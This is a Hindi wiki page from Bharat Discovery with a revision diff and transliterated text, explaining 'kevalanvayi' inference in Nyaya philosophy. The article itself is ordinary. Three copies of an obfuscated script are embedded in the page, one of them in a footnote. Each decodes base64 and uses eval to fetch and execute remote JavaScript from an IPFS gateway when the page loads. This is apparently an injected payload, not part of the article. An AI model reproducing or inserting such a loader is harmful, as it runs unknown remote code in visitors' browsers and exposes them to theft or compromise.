Difference between revisions of "केवलान्वयी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''केवलान्वयी''' न्यायदर्शन में एक प्रकार का विशेष अन...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
'''केवलान्वयी''' न्यायदर्शन में एक प्रकार का विशेष अनुमान। यहाँ हेतु साध्य के साथ सर्वदा सत्तात्मक रूप से ही संबद्ध रहता है। न्यायदर्शन के अनुसार व्याप्ति दो प्रकार से हो सकती है-अन्वयमुखेन तथा व्यतिरेकमुखेन। अन्वय का अर्थ है-तत्सत्त्वे तत्‌सत्ता अर्थात्‌ किसी वस्तु के होने पर किसी वस्तु की स्थिति, जैसे धूम के रहने पर अग्नि की स्थिति। व्यतिरेक व्याप्ति वहाँ होती है जहाँ हेतु तथा साध्य का संबंध निषेधमुखेन सिद्ध होता है। केवलान्वयी अनुमान केवल प्रथम व्याप्ति के ऊपर ही आधारित रहता है। यथा समस्त ज्ञेय पदार्थ अभिधेय होते हैं (प्रतिज्ञा) घट एक पदार्थ है (हेतुवाक्य), अतएव घट अभिधेय है (निगम)।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 3|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=123 |url=}}</ref>
+
'''केवलान्वयी''' [[न्याय दर्शन|न्याय दर्शन]] में एक प्रकार का विशेष अनुमान है। यहाँ हेतु साध्य के साथ सर्वदा सत्तात्मक रूप से ही संबद्ध रहता है। न्याय दर्शन के अनुसार व्याप्ति दो प्रकार से हो सकती है -
 +
#अन्वयमुखेन तथा  
 +
#व्यतिरेकमुखेन।  
  
ज्ञेय का अर्थ है ज्ञान का विषय होना। (अर्थात्‌ वह पदार्थ जिसे हम जान सकते हैं)। अभिधेय का अर्थ है अभिधा (या संज्ञा) का विषय होना अर्थात्‌ वह पदार्थ जिसे हम कोई नाम दे सकते हैं। जगत्‌ का यह नियम है कि ज्ञानविषय होते ही पदार्थ का कोई न कोई नाम अवश्यमेव दिया जाता है। यह व्याप्ति सत्तात्मक रूप से ही सिद्ध की जा सकती है, निषेधमुखेन नहीं, क्योंकि कोई भी ऐसा पदार्थ नहीं हैै जिसको नाम न दिया जा सके। अर्थात्‌ अभिधेयाभाव को हम ज्ञेयभाव के साथ दृष्टांत के अभाव में कथमपि संबद्ध नहीं सिद्ध कर सकते। इसलिये ऊपरवाला निगमन केवल अन्वयव्याप्ति के आधार पर ही सिद्ध किया जा सकता है। इसीलिये ये अनुमान केपलान्वयी कहलाता है।<ref>देखिए-अन्वयव्यतिरेक</ref>
+
अन्वय का अर्थ है - तत्सत्त्वे तत्‌सत्ता अर्थात्‌ किसी वस्तु के होने पर किसी वस्तु की स्थिति, जैसे धूम के रहने पर [[अग्नि]] की स्थिति। व्यतिरेक व्याप्ति वहाँ होती है जहाँ हेतु तथा साध्य का संबंध निषेधमुखेन सिद्ध होता है। केवलान्वयी अनुमान केवल प्रथम व्याप्ति के ऊपर ही आधारित रहता है। यथा समस्त ज्ञेय पदार्थ अभिधेय होते हैं<ref>प्रतिज्ञा</ref> घट एक पदार्थ है<ref>हेतुवाक्य</ref>, अतएव घट अभिधेय है।<ref>निगम</ref><ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 3|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=123 |url=}}</ref>
 +
 
 +
*'''ज्ञेय''' का अर्थ है ज्ञान का विषय होना अर्थात्‌ वह पदार्थ जिसे हम जान सकते हैं।
 +
*अभिधेय का अर्थ है अभिधा या संज्ञा का विषय होना अर्थात्‌ वह पदार्थ जिसे हम कोई नाम दे सकते हैं। जगत्‌ का यह नियम है कि ज्ञान विषय होते ही पदार्थ का कोई न कोई नाम अवश्यमेव दिया जाता है। यह व्याप्ति सत्तात्मक रूप से ही सिद्ध की जा सकती है, निषेधमुखेन नहीं, क्योंकि कोई भी ऐसा पदार्थ नहीं हैै जिसको नाम न दिया जा सके। अर्थात्‌ अभिधेयाभाव को हम ज्ञेयभाव के साथ [[दृष्टांत]] के अभाव में कथमपि संबद्ध नहीं सिद्ध कर सकते। इसलिये ऊपर वाला निगमन केवल अन्वय व्याप्ति के आधार पर ही सिद्ध किया जा सकता है। इसीलिये ये अनुमान '''केपलान्वयी''' कहलाता है।<ref>देखिए-अन्वयव्यतिरेक</ref>
  
  

Revision as of 05:44, 13 January 2020

kevalanvayi nyay darshan mean ek prakar ka vishesh anuman hai. yahaan hetu sadhy ke sath sarvada sattatmak roop se hi sanbaddh rahata hai. nyay darshan ke anusar vyapti do prakar se ho sakati hai -

  1. anvayamukhen tatha
  2. vyatirekamukhen.

anvay ka arth hai - tatsattve tath‌satta arthath‌ kisi vastu ke hone par kisi vastu ki sthiti, jaise dhoom ke rahane par agni ki sthiti. vyatirek vyapti vahaan hoti hai jahaan hetu tatha sadhy ka sanbandh nishedhamukhen siddh hota hai. kevalanvayi anuman keval pratham vyapti ke oopar hi adharit rahata hai. yatha samast jney padarth abhidhey hote haian[1] ghat ek padarth hai[2], atev ghat abhidhey hai.[3][4]

  • jney ka arth hai jnan ka vishay hona arthath‌ vah padarth jise ham jan sakate haian.
  • abhidhey ka arth hai abhidha ya sanjna ka vishay hona arthath‌ vah padarth jise ham koee nam de sakate haian. jagath‌ ka yah niyam hai ki jnan vishay hote hi padarth ka koee n koee nam avashyamev diya jata hai. yah vyapti sattatmak roop se hi siddh ki ja sakati hai, nishedhamukhen nahian, kyoanki koee bhi aisa padarth nahian haiai jisako nam n diya ja sake. arthath‌ abhidheyabhav ko ham jneyabhav ke sath drishtaant ke abhav mean kathamapi sanbaddh nahian siddh kar sakate. isaliye oopar vala nigaman keval anvay vyapti ke adhar par hi siddh kiya ja sakata hai. isiliye ye anuman kepalanvayi kahalata hai.[5]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. pratijna
  2. hetuvaky
  3. nigam
  4. hindi vishvakosh, khand 3 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 123 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  5. dekhie-anvayavyatirek

sanbandhit lekh